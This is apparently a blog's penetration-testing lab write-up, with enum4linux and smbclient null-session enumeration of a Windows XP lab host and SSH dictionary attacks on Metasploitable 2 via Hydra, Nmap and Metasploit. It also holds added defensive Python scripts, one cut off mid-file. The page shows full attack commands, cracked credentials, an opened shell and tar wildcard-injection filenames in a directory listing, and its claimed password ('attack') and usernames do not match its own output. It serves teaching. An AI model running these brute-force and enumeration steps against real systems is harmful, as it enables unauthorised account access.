            [+] Builtin
    
    [+] Password Info for Domain: ELS-WINXP
    
            [+] Minimum password length: None
            [+] Password history length: None
            [+] Maximum password age: 42 days 22 hours 47 minutes 
            [+] Password Complexity Flags: 000000
    
                    [+] Domain Refuse Password Change: 0
                    [+] Domain Password Store Cleartext: 0
                    [+] Domain Password Lockout Admins: 0
                    [+] Domain Password No Clear Change: 0
                    [+] Domain Password No Anon Change: 0
                    [+] Domain Password Complex: 0
    
            [+] Minimum password age: None
            [+] Reset Account Lockout Counter: 30 minutes 
            [+] Locked Account Duration: 30 minutes 
            [+] Account Lockout Threshold: None
            [+] Forced Log off Time: Not Set
    
    
    [+] Retieved partial password policy with rpcclient:
    
    Password Complexity: Disabled
    Minimum Password Length: 0
    
    
     ================================ 
    |    Groups on 192.168.99.162    |
     ================================ 
    
    [+] Getting builtin groups:
    group:[Administrators] rid:[0x220]
    group:[Backup Operators] rid:[0x227]
    group:[Guests] rid:[0x222]
    group:[Network Configuration Operators] rid:[0x22c]
    group:[Power Users] rid:[0x223]
    group:[Remote Desktop Users] rid:[0x22b]
    group:[Replicator] rid:[0x228]
    group:[Users] rid:[0x221]
    
    [+] Getting builtin group memberships:
    Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
    Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
    Group 'Users' (RID: 545) has member: ELS-WINXP\netadmin
    Group 'Users' (RID: 545) has member: ELS-WINXP\Frank
    Group 'Guests' (RID: 546) has member: ELS-WINXP\Guest
    Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator
    Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS
    Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin
    
    [+] Getting local groups:
    group:[HelpServicesGroup] rid:[0x3e9]
    
    [+] Getting local group memberships:
    Group 'HelpServicesGroup' (RID: 1001) has member: ELS-WINXP\SUPPORT_388945a0
    
    [+] Getting domain groups:
    group:[None] rid:[0x201]
    
    [+] Getting domain group memberships:
    Group 'None' (RID: 513) has member: ELS-WINXP\Administrator
    Group 'None' (RID: 513) has member: ELS-WINXP\Guest
    Group 'None' (RID: 513) has member: ELS-WINXP\HelpAssistant
    Group 'None' (RID: 513) has member: ELS-WINXP\SUPPORT_388945a0
    Group 'None' (RID: 513) has member: ELS-WINXP\eLS
    Group 'None' (RID: 513) has member: ELS-WINXP\netadmin
    Group 'None' (RID: 513) has member: ELS-WINXP\Frank
    
     ========================================================================= 
    |    Users on 192.168.99.162 via RID cycling (RIDS: 500-550,1000-1050)    |
     ========================================================================= 
    [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.
    [I] Found new SID: S-1-5-32
    [I] Found new SID: S-1-5-21-823518204-2025429265-839522115
    [+] Enumerating users using SID S-1-5-32 and logon username '', password ''
    [+] Enumerating users using SID S-1-5-21-823518204-2025429265-839522115 and logon username '', password ''
    
     =============================================== 
    |    Getting printer info for 192.168.99.162    |
     =============================================== 
    Cannot connect to server.  Error was NT_STATUS_NETWORK_UNREACHABLE
    
    
    enum4linux complete on Sun Dec 26 22:35:32 2021
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    
    
    


    As we can see in the previous screenshots, we were able to gather a lot of information from the machine.
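An added example, not code from the original post or from the enum4linux project: the script below reads the plain-text report enum4linux prints (the one above, or one saved with `enum4linux -a host > report.txt`) and reduces it to the findings a defender would want to fix first: the null-session line, the anonymously enumerated accounts, which shares are listable without credentials, the password policy (note "Account Lockout Threshold: None" above, which is what lets the dictionary attacks later on this page run unthrottled) and the membership of the Administrators group. The report text embedded in it is a constructed, shortened excerpt modelled on the output above.

```python
"""Turn an enum4linux report into a prioritised list of defender findings.

Added example: this is not code from the original post or from the
enum4linux project. It reads the plain-text report enum4linux prints
and extracts the facts that matter for hardening the host.
"""
import re

# Constructed, shortened excerpt modelled on the report shown in the post.
SAMPLE_REPORT = """\
[+] Server 192.168.99.162 allows sessions using username '', password ''
user:[Administrator] rid:[0x1f4]
user:[eLS] rid:[0x3eb]
user:[Frank] rid:[0x3ed]
user:[Guest] rid:[0x1f5]
//192.168.99.162/IPC$   Mapping: OK     Listing: DENIED
//192.168.99.162/Frank  Mapping: OK     Listing: DENIED
//192.168.99.162/WorkSharing    Mapping: OK, Listing: OK
//192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A
        [+] Minimum password length: None
        [+] Password Complexity Flags: 000000
        [+] Account Lockout Threshold: None
Group 'Administrators' (RID: 544) has member: ELS-WINXP\\Administrator
Group 'Administrators' (RID: 544) has member: ELS-WINXP\\eLS
Group 'Administrators' (RID: 544) has member: ELS-WINXP\\netadmin
"""

# One pattern per enum4linux line type we care about (multi-line mode, so ^ is line start).
NULL_SESSION_RE = re.compile(r"allows sessions using username '', password ''")
USER_RE = re.compile(r"^\s*user:\[(?P<name>[^\]]+)\] rid:\[(?P<rid>0x[0-9a-fA-F]+)\]", re.M)
SHARE_RE = re.compile(
    r"^\s*//(?P<host>[^/\s]+)/(?P<share>\S+)\s+Mapping: (?P<map>\w+),?\s+Listing: (?P<list>\S+)",
    re.M,
)
POLICY_RE = re.compile(
    r"\[\+\] (?P<key>Minimum password length|Password Complexity Flags|Account Lockout Threshold): (?P<val>.+)$",
    re.M,
)
ADMIN_RE = re.compile(r"^\s*Group 'Administrators' \(RID: 544\) has member: (?P<member>.+)$", re.M)


def parse_report(text):
    """Extract the structured facts from a raw enum4linux report."""
    return {
        "null_session": bool(NULL_SESSION_RE.search(text)),
        "users": [(m["name"], int(m["rid"], 16)) for m in USER_RE.finditer(text)],
        "shares": {m["share"]: (m["map"], m["list"]) for m in SHARE_RE.finditer(text)},
        "policy": {m["key"]: m["val"].strip() for m in POLICY_RE.finditer(text)},
        "admins": [m["member"].strip() for m in ADMIN_RE.finditer(text)],
    }


def audit(text):
    """Return human-readable findings, most serious first."""
    r = parse_report(text)
    findings = []
    if r["null_session"]:
        findings.append("null session accepted: the host answers RPC queries without credentials")
    if r["users"]:
        names = ", ".join(name for name, _ in r["users"])
        findings.append(f"{len(r['users'])} accounts enumerated anonymously: {names}")
    listable = sorted(share for share, (_, listing) in r["shares"].items() if listing == "OK")
    if listable:
        findings.append("shares listable without credentials: " + ", ".join(listable))
    policy = r["policy"]
    if policy.get("Minimum password length") == "None":
        findings.append("no minimum password length")
    if policy.get("Password Complexity Flags") == "000000":
        findings.append("password complexity disabled")
    if policy.get("Account Lockout Threshold") == "None":
        findings.append("no account lockout threshold: online password guessing is never throttled")
    if len(r["admins"]) > 1:
        findings.append(f"{len(r['admins'])} members of Administrators: " + ", ".join(r["admins"]))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_REPORT):
        print("-", finding)
```

On the report above every one of the seven checks fires. The fixes are the usual ones for a host that answers null sessions: disallow anonymous enumeration of SAM accounts and shares, remove the anonymous read on the WorkSharing share, and set a minimum password length, complexity and a lockout threshold so that the password-guessing shown later on this page is both harder and detectable.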




    Use smbclient to navigate the target machine


    A very useful tool that we can use to access remote shares and browse the remote machine is smbclient.

    First let us get the list of shares using smbclient:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo smbclient -L WORKGROUP -I 192.168.99.162  -N -U ""
    
            Sharename       Type      Comment
            ---------       ----      -------
            My Documents    Disk      
            IPC$            IPC       Remote IPC
            Frank           Disk      
            C               Disk      
            WorkSharing     Disk      
            FrankDocs       Disk      
            ADMIN$          Disk      Remote Admin
            C$              Disk      Default share
    Reconnecting with SMB1 for workgroup listing.
    
            Server               Comment
            ---------            -------
    
            Workgroup            Master
            ---------            -------
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    

    Let us now try to access the WorkSharing share and see what files are stored in there:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$                                                                                                                               1
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo smbclient \\\\192.168.99.162\\WorkSharing -N                                                                             1 ⨯
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Wed Feb 18 16:37:31 2015
      ..                                  D        0  Wed Feb 18 16:37:31 2015
      Congratulations.txt                 A       66  Wed Feb 18 15:11:59 2015
    
                    785224 blocks of size 4096. 345613 blocks available
    smb: \> 
    smb: \> get congratulations.txt /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt
    getting file \congratulations.txt of size 66 as /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    smb: \> 
    
    
    







    As we can see in the previous screenshot, there is a file named Congratulations.txt. Let us download it to our machine and then use the cat command to display its content.




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ cat congratulations.txt                     
    Congratulations! You have successfully exploited a null session!
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    
    
    



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. We do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.


  • Brute Force and Password Cracking Live via three different tools

     

    Brute Force and Password Cracking Live via three different tools

     


    Representation


    You are a Penetration Tester hired by the company Hacking Truth to perform password cracking/brute force tests on their internal web application and machines, the usernames already being known from a security test. You are asked to perform the penetration test on the client premises.



    Brute Force and Password Cracking Live on Metasploitable 2 via three different tools



    In this Metasploitable 2 environment, we get access to a Kali GUI instance. The SSH server can be reached using the tools installed on the Kali virtual machine.

    Objective: Perform the following activities:

    1. Find the password of user "msfadmin" using Hydra. Use the password dictionary /home/hackerboy/Desktop/Penetration-tester-jr/user.txt or rockyou.txt.

    2. Find the password of user "msfadmin" using the appropriate Nmap script. The default password dictionary is /usr/share/nmap/nselib/data/passwords.lst and the user list is /home/hackerboy/Desktop/Penetration-tester-jr/user1.txt.

    3. Find the password of user "msfadmin" using the ssh_login Metasploit module. Use the userpass dictionary /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt.

     

     

    Tools


    The best tools for this lab are:

    # Metasploit Framework
    # Hydra
    # Nmap

     

     


    Check the interfaces present on the Kali machine.

    Command - ifconfig

     


     

    The eth0 interface is available and its IP is 192.168.6.45.




    Using Hydra


    Use Hydra to launch a dictionary attack on the SSH service for the "student" user.

    Hydra

    # Multi-threaded authentication brute force tool
    # Supports numerous protocols, including FTP, HTTP, IMAP, IRC, LDAP, SSH, VNC, etc.
    # Written in C


    Hydra help option

     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ hydra -h                                                                                       
    Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    
    Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
    
    Options:
      -R        restore a previous aborted/crashed session
      -I        ignore an existing restore file (don't wait 10 seconds)
      -S        perform an SSL connect
      -s PORT   if the service is on a different default port, define it here
      -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
      -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
      -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
      -y        disable use of symbols in bruteforce, see above
      -r        use a non-random shuffling method for option -x
      -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
      -u        loop around users, not passwords (effective! implied with -x)
      -C FILE   colon separated "login:pass" format, instead of -L/-P options
      -M FILE   list of servers to attack, one entry per line, ':' to specify port
      -o FILE   write found login/password pairs to FILE instead of stdout
      -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
      -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
      -t TASKS  run TASKS number of connects in parallel per target (default: 16)
      -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
      -w / -W TIME  wait time for a response (32) / between connects per thread (0)
      -c TIME   wait time per login attempt over all threads (enforces -t 1)
      -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
      -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode 
      -O        use old SSL v2 and v3
      -K        do not redo failed attempts (good for -M mass scanning)
      -q        do not print messages about connection errors
      -U        service module usage details
      -m OPT    options specific for a module, see -U output for information
      -h        more command line options (COMPLETE HELP)
      server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
      service   the service to crack (see below for supported protocols)
      OPT       some service modules support additional input (-U for module help)
    
    Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
    
    Hydra is a tool to guess/crack valid login/password pairs.
    Licensed under AGPL v3.0. The newest version is always available at;
    https://github.com/vanhauser-thc/thc-hydra
    Please don't use in military or secret service organizations, or for illegal
    purposes. (This is a wish and non-binding - most such people do not care about
    laws and ethics anyway - and tell themselves they are one of the good ones.)
    These services were not compiled in: afp ncp oracle sapr3 smb2.
    
    Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
    E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
         % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
         % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
         % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)
    
    Examples:
      hydra -l user -P passlist.txt ftp://192.168.0.1
      hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
      hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
      hydra -l admin -p password ftp://[192.168.0.0/24]/
      hydra -L logins.txt -P pws.txt -M targets.txt ssh
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$                   
    



    We are going to use wordlist /home/hackerboy/Desktop/Penetration-tester-jr/user.txt or rockyou.txt


    Now, use the Hydra tool to launch the attack.



    Command

    hydra -l msfadmin -P /home/hackerboy/Desktop/Penetration-tester-jr/user.txt ssh://192.168.6.45

    -l
    Login with a single username

    -P
    Load several passwords from the list


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ hydra -l msfadmin -P /home/hackerboy/Desktop/Penetration-tester-jr/user.txt ssh://192.168.6.45 
    Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    
    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-24 20:33:02
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries (l:1/p:13), ~1 try per task
    [DATA] attacking ssh://192.168.6.45:22/
    [22][ssh] host: 192.168.6.45   login: msfadmin   password: msfadmin
    1 of 1 target successfully completed, 1 valid password found
    [WARNING] Writing restore file because 1 final worker threads did not complete until end.
    [ERROR] 1 target did not resolve or could not be connected
    [ERROR] 0 target did not complete
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-24 20:33:05
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$                                                                                                                            
    
    
    





    The password for the msfadmin user is msfadmin.




    Using Nmap Script


    We will run the ssh-brute Nmap script to find the password of the "administrator" user.

    Password list used by default by Nmap:

    /usr/share/john/password.lst


    /home/hackerboy/Desktop/Penetration-tester-jr/user1.txt




    ssh-brute script


    ssh-brute.nse is an Nmap script used to launch dictionary attacks on the SSH service.

    This script takes a username list file and a password list file. This is useful when the target username is not known to the attacker. However, in this case we already know the username, i.e. "administrator", so we will create a new file containing only this username.


    Command


    echo "msfadmin" > users1.txt

    NOTE: msfadmin is our username.



    The password list is "/usr/share/nmap/nselib/data/passwords.lst".

    We can now run the script:


    Command

    nmap -p 22 --script ssh-brute --script-args userdb=/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt 192.168.6.45


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo nmap -p 22 --script ssh-brute --script-args userdb=/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt 192.168.6.45 
    [sudo] password for hackerboy: 
    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-24 20:35 IST
    NSE: [ssh-brute] Trying username/password pair: msfadmin:msfadmin
    NSE: [ssh-brute] Trying username/password pair: msfadmin:
    NSE: [ssh-brute] Trying username/password pair: msfadmin:123456
    NSE: [ssh-brute] Trying username/password pair: msfadmin:12345
    NSE: [ssh-brute] Trying username/password pair: msfadmin:123456789
    Nmap scan report for 192.168.6.45
    Host is up (0.00036s latency).
    
    PORT   STATE SERVICE
    22/tcp open  ssh
    | ssh-brute: 
    |   Accounts: 
    |     msfadmin:msfadmin - Valid credentials
    |_  Statistics: Performed 5 guesses in 13 seconds, average tps: 0.4
    MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
    
    Nmap done: 1 IP address (1 host up) scanned in 23.21 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    
    
    

     


     


    The password of the "msfadmin" user is msfadmin






    Using Metasploit


    We can use the auxiliary/scanner/ssh/ssh_login auxiliary module of the Metasploit framework to find the valid password for the "msfadmin" user.

    ssh_login module

    It is an auxiliary scanner module for the SSH service in Metasploit. On success it also opens an SSH shell session.


    Start msfconsole in quiet mode using the -q option.



    Command

    msfconsole -q

     



    Use the auxiliary/scanner/ssh/ssh_login module and set all required target details, i.e. RHOSTS, USERPASS_FILE, STOP_ON_SUCCESS, verbose, etc.



    Password List

    /usr/share/wordlists/metasploit/root_userpass.txt or /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt

     

    Command

    use auxiliary/scanner/ssh/ssh_login
    set RHOSTS demo.ine.local
    set USERPASS_FILE /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
    set STOP_ON_SUCCESS true
    set verbose true
    exploit




    RHOSTS: Target IP address

    USERPASS_FILE: Custom username and password file, i.e. user:pass

    STOP_ON_SUCCESS: If set to true, the operation stops after finding the working credentials

    verbose: If set to true, operation logs are shown on the console

     

     

    userpass.txt

     

     

     



     

    msf6 >
    msf6 > search ssh_login
    
    Matching Modules
    ================
    
       #  Name                                    Disclosure Date  Rank    Check  Description
       -  ----                                    ---------------  ----    -----  -----------
       0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
       1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner
    
    
    Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
    
    msf6 > use 0
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    
    
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.6.45
    RHOSTS => 192.168.6.45
    msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
    USERPASS_FILE => /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
    msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
    STOP_ON_SUCCESS => true
    msf6 auxiliary(scanner/ssh/ssh_login) > set verbose true
    verbose => true
    msf6 auxiliary(scanner/ssh/ssh_login) > exploit
    
    [*] 192.168.6.45:22 - Starting bruteforce
    [-] 192.168.6.45:22 - Failed: 'hackerboy:hackerbo'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:hacker'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:atul'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:atulthehackerboy'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:fadsg'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:fdasg'
    [+] 192.168.6.45:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
    [*] Command shell session 2 opened (192.168.6.25:42191 -> 192.168.6.45:22 ) at 2021-12-24 20:00:21 +0530
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    
    

     

     




    The password for the "msfadmin" user is attack. The tools have also provided an SSH shell.

    Command

    sessions

     

     

    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > sessions
    
    Active sessions
    ===============
    
      Id  Name  Type         Information                                Connection
      --  ----  ----         -----------                                ----------
      1         shell linux  SSH hackerboy:hackerboy (192.168.6.25:22)  192.168.6.25:41331 -> 192.168.6.25:22  (192.168.6.25)
      2         shell linux  SSH msfadmin:msfadmin (192.168.6.45:22)    192.168.6.25:42191 -> 192.168.6.45:22  (192.168.6.45)
    
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    
    

     

     



    Metasploit framework takes more time for dictionary attacks in comparison to Hydra and Nmap.

    We can use the credentials to access the target machine using the SSH command.



    SSH to the target machine using the credentials of user "root".


    Command

    ssh msfadmin@192.168.6.45
    <yes>
    <attack>
    id
    whoami
    ls -la


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$                                                                                                                             130 ⨯
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ ssh msfadmin@192.168.6.45                                                                                                   130 ⨯
    The authenticity of host '192.168.6.45 (192.168.6.45)' can't be established.
    RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
    This host key is known by the following other names/addresses:
        ~/.ssh/known_hosts:2: [hashed name]
        ~/.ssh/known_hosts:6: [hashed name]
        ~/.ssh/known_hosts:80: [hashed name]
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.6.45' (RSA) to the list of known hosts.
    msfadmin@192.168.6.45's password: 
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
    
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    
    To access official Ubuntu documentation, please visit:
    http://help.ubuntu.com/
    No mail.
    Last login: Fri Dec 24 09:17:35 2021
    msfadmin@metasploitable:~$ id
    uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
    msfadmin@metasploitable:~$       
    msfadmin@metasploitable:~$ whoami
    msfadmin
    msfadmin@metasploitable:~$ 
    msfadmin@metasploitable:~$ ls -la
    total 68
    drwxr-xr-x 7 msfadmin msfadmin 4096 2021-07-09 16:15 .
    drwxrwxrwx 7 root     root     4096 2021-06-02 05:32 ..
    lrwxrwxrwx 1 root     root        9 2012-05-14 00:26 .bash_history -> /dev/null
    -rw-r--r-- 1 msfadmin msfadmin    1 2021-06-02 06:04 --checkpoint=1
    -rw-r--r-- 1 msfadmin msfadmin    1 2021-06-02 06:03 --checkpoint-action=exec=sh test.sh
    -rw-r--r-- 1 msfadmin msfadmin    0 2020-12-05 10:37 data.txt
    drwxr-xr-x 4 msfadmin msfadmin 4096 2010-04-17 14:11 .distcc
    drwx------ 2 msfadmin msfadmin 4096 2021-07-13 06:25 .gconf
    drwx------ 2 msfadmin msfadmin 4096 2021-07-13 06:25 .gconfd
    -rw-r--r-- 1 msfadmin msfadmin  891 2021-04-25 08:20 index.html
    -rw-r--r-- 1 msfadmin msfadmin  891 2021-04-25 08:20 index.html.1
    -rw-r--r-- 1 msfadmin msfadmin   14 2021-04-25 08:22 index.html.2
    -rw------- 1 root     root     4174 2012-05-14 02:01 .mysql_history
    -rw-r--r-- 1 msfadmin msfadmin  586 2010-03-16 19:12 .profile
    -rwx------ 1 msfadmin msfadmin    4 2012-05-20 14:22 .rhosts
    drwx------ 2 msfadmin msfadmin 4096 2020-12-05 10:18 .ssh
    -rw-r--r-- 1 msfadmin msfadmin    0 2010-05-07 14:38 .sudo_as_admin_successful
    -rw-r--r-- 1 msfadmin msfadmin   56 2021-06-02 06:03 test.sh
    drwxr-xr-x 6 msfadmin msfadmin 4096 2010-04-27 23:44 vulnerable
    msfadmin@metasploitable:~$ 
    
    
    

     


    This is how we can launch dictionary attacks on services using Hydra, Nmap, and Metasploit.
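The three runs above (Hydra, the ssh-brute NSE script and the ssh_login module) all leave the same trace on the target: a burst of "Failed password" entries for one account from one source in /var/log/auth.log, then an "Accepted password" line once the right guess lands. The script below is an added example, not part of the original post or of any of the three tools, that parses sshd auth.log lines and raises one alert when a source crosses a failure threshold inside a sliding window and a second when that same source then authenticates successfully. The log lines are constructed to resemble the Hydra run (the year, host name, PIDs and client ports are assumed).

```python
"""Flag SSH password-guessing bursts in sshd auth.log lines.

Added example: not code from the original post or from Hydra, Nmap or
Metasploit. It models the server-side view of the runs above: many
"Failed password" lines from one source in a short window, then an
"Accepted password" line once the right guess lands.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt resembling the run in the post (year, host name,
# PIDs and client ports are assumed; nothing here is captured data).
SAMPLE_AUTH_LOG = """\
Dec 24 20:33:02 metasploitable sshd[4201]: Failed password for msfadmin from 192.168.6.25 port 42101 ssh2
Dec 24 20:33:02 metasploitable sshd[4202]: Failed password for msfadmin from 192.168.6.25 port 42102 ssh2
Dec 24 20:33:03 metasploitable sshd[4203]: Failed password for msfadmin from 192.168.6.25 port 42103 ssh2
Dec 24 20:33:03 metasploitable sshd[4204]: Failed password for msfadmin from 192.168.6.25 port 42104 ssh2
Dec 24 20:33:04 metasploitable sshd[4205]: Failed password for msfadmin from 192.168.6.25 port 42105 ssh2
Dec 24 20:33:04 metasploitable sshd[4206]: Failed password for invalid user hackerboy from 192.168.6.25 port 42106 ssh2
Dec 24 20:33:05 metasploitable sshd[4213]: Accepted password for msfadmin from 192.168.6.25 port 42191 ssh2
Dec 24 20:45:10 metasploitable sshd[4400]: Failed password for msfadmin from 192.168.6.77 port 50001 ssh2
Dec 24 20:47:55 metasploitable sshd[4401]: Accepted password for msfadmin from 192.168.6.77 port 50002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


def parse_line(line, year=2021):
    """Parse one sshd password-auth line; syslog omits the year, so it is supplied."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "src": m["src"]}


def detect(log_text, threshold=5, window_seconds=60):
    """Sliding-window detector over auth.log text.

    Emits a 'burst' alert the first time a source reaches `threshold`
    failures inside `window_seconds`, and a 'success_after_failures'
    alert if that source then authenticates successfully, which is the
    signature of a dictionary attack that worked.
    """
    recent = defaultdict(deque)  # src -> timestamps of failures still inside the window
    bursting = set()             # sources currently above threshold
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        src, q = ev["src"], recent[ev["src"]]
        # Expire failures that fell out of the window; a quiet source stops bursting.
        while q and (ev["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if not q:
            bursting.discard(src)
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            if len(q) >= threshold and src not in bursting:
                bursting.add(src)
                alerts.append({"type": "burst", "src": src, "failures": len(q), "at": ev["ts"]})
        else:
            if src in bursting:
                alerts.append({"type": "success_after_failures", "src": src,
                               "user": ev["user"], "at": ev["ts"]})
            bursting.discard(src)
            q.clear()
    return alerts


if __name__ == "__main__":
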